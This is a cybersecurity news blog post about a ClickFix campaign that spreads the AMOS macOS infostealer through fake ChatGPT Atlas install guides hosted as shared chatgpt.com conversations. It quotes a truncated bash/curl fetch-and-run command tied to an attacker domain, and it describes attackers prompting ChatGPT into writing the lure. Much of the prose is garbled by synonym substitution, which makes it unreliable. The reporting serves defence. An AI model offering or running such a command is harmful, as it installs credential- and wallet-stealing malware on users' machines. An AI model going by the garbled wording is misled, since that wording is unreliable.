Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New ClickFix Attacks as macOS Infostealer Leverages Official ChatGPT Website by Piggybacking

Posted on December 11, 2025December 11, 2025 By CWS

A brand new malicious marketing campaign is focusing on macOS customers by way of a novel assault that exploits ChatGPT’s official web site.

The attackers are utilizing a way referred to as ClickFix to unfold the AMOS infostealer by posting pretend set up guides on the professional chatgpt.com area.

This marketing campaign leverages ChatGPT’s chat-sharing characteristic, the place any consumer can create a public dialog and share it with others by way of a hyperlink that seems to originate from OpenAI’s official web site.

The assault begins with paid search advertisements on Google. When customers seek for “chatgpt atlas,” they encounter sponsored hyperlinks that seem to steer on to the official ChatGPT area.

A sponsored hyperlink in Google search outcomes results in a malware set up information disguised as ChatGPT Atlas for macOS and hosted on the official ChatGPT web site (Supply – Kaspersky)

The advert shows the title “ChatGPT™ Atlas for macOS – Obtain ChatGPT Atlas for Mac,” which makes it seem fully professional.

Customers who click on on these advertisements are taken to a shared ChatGPT dialog that incorporates pretend set up directions for the nonexistent Atlas browser.

After in depth evaluation, Kaspersky safety researchers recognized that the malicious actors used immediate engineering to drive ChatGPT into producing a convincing set up information.

The attackers then cleaned the chat historical past to take away any suspicious content material earlier than making the chat public.

The set up information for the supposed Atlas for macOS is merely a shared chat between an nameless consumer and ChatGPT (Supply – Kaspersky)

The information seems on the chatgpt.com/share/ subdomain, which might make it appear extra reliable to customers who might not acknowledge that it’s merely a shared dialog fairly than official content material from OpenAI.

The An infection Mechanism

The pretend set up information instructs customers to open the Terminal software on their Mac and run a particular command.

The malicious code seems like this:-

/bin/bash -c “$(curl -fsSL ‘

This command downloads a malicious script from the attacker-controlled server at atlas-extension.com and executes it instantly on the sufferer’s laptop.

When executed, the script prompts for the system password and repeatedly asks till the right password is entered. As soon as the password is offered, the script downloads the AMOS infostealer and installs it utilizing the stolen credentials.

If you happen to ask ChatGPT whether or not you must comply with the directions you obtained, it’s going to reply that it’s not protected (Supply – Kaspersky)

AMOS can steal passwords, cookies, and different browser knowledge from Chrome and Firefox. It additionally targets cryptocurrency pockets data from purposes equivalent to Electrum, Coinomi, and Exodus.

The malware collects information with TXT, PDF, and DOCX extensions from folders like Desktop, Paperwork, and Downloads. Moreover, it installs a backdoor that begins routinely at system startup, giving attackers persistent distant entry to the contaminated system.

Observe us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Attacks, ChatGPT, ClickFix, InfoStealer, Leverages, macOS, Official, Piggybacking, Website

Post navigation

Previous Post: MITRE Posts Results of 2025 ATT&CK Enterprise Evaluations
Next Post: Microsoft Teams to Introduce External Domains Anomalies Report for Enhanced Security

Related Posts

Beware of Fake ‘LastPass Hack’ Emails Trying to Trick Users Into Installing Malware Cyber Security News
ERMAC v3.0 Banking Malware Source Code Exposed via Weak Password Cyber Security News
Malicious Chrome Extension Silently Steal and Injects Hidden SOL Fees Into Solana Swaps Cyber Security News
Threat Actors Advertising Anivia Stealer Malware on Dark Web Bypassing UAC Controls Cyber Security News
China-based Threat Actor Mustang Panda’s Tactics, Techniques, and Procedures Unveiled Cyber Security News
Cybersecurity Newsletter Weekly – AWS Outage, WSUS Exploitation, Chrome Flaws, and RDP Attacks Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Recent GeoServer Vulnerability Exploited in Attacks
  • Microsoft Bug Bounty Program Expanded to Third-Party Code
  • New BlackForce Phishing Kit Lets Attackers Steal Credentials Using MitB Attacks and Bypass MFA
  • Policy, Isolation, and Data Controls That Actually Work
  • Beware of Fake Leonardo DiCaprio Movie Torrent File Drops Agent Tesla Malware

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Recent GeoServer Vulnerability Exploited in Attacks
  • Microsoft Bug Bounty Program Expanded to Third-Party Code
  • New BlackForce Phishing Kit Lets Attackers Steal Credentials Using MitB Attacks and Bypass MFA
  • Policy, Isolation, and Data Controls That Actually Work
  • Beware of Fake Leonardo DiCaprio Movie Torrent File Drops Agent Tesla Malware

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2025 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark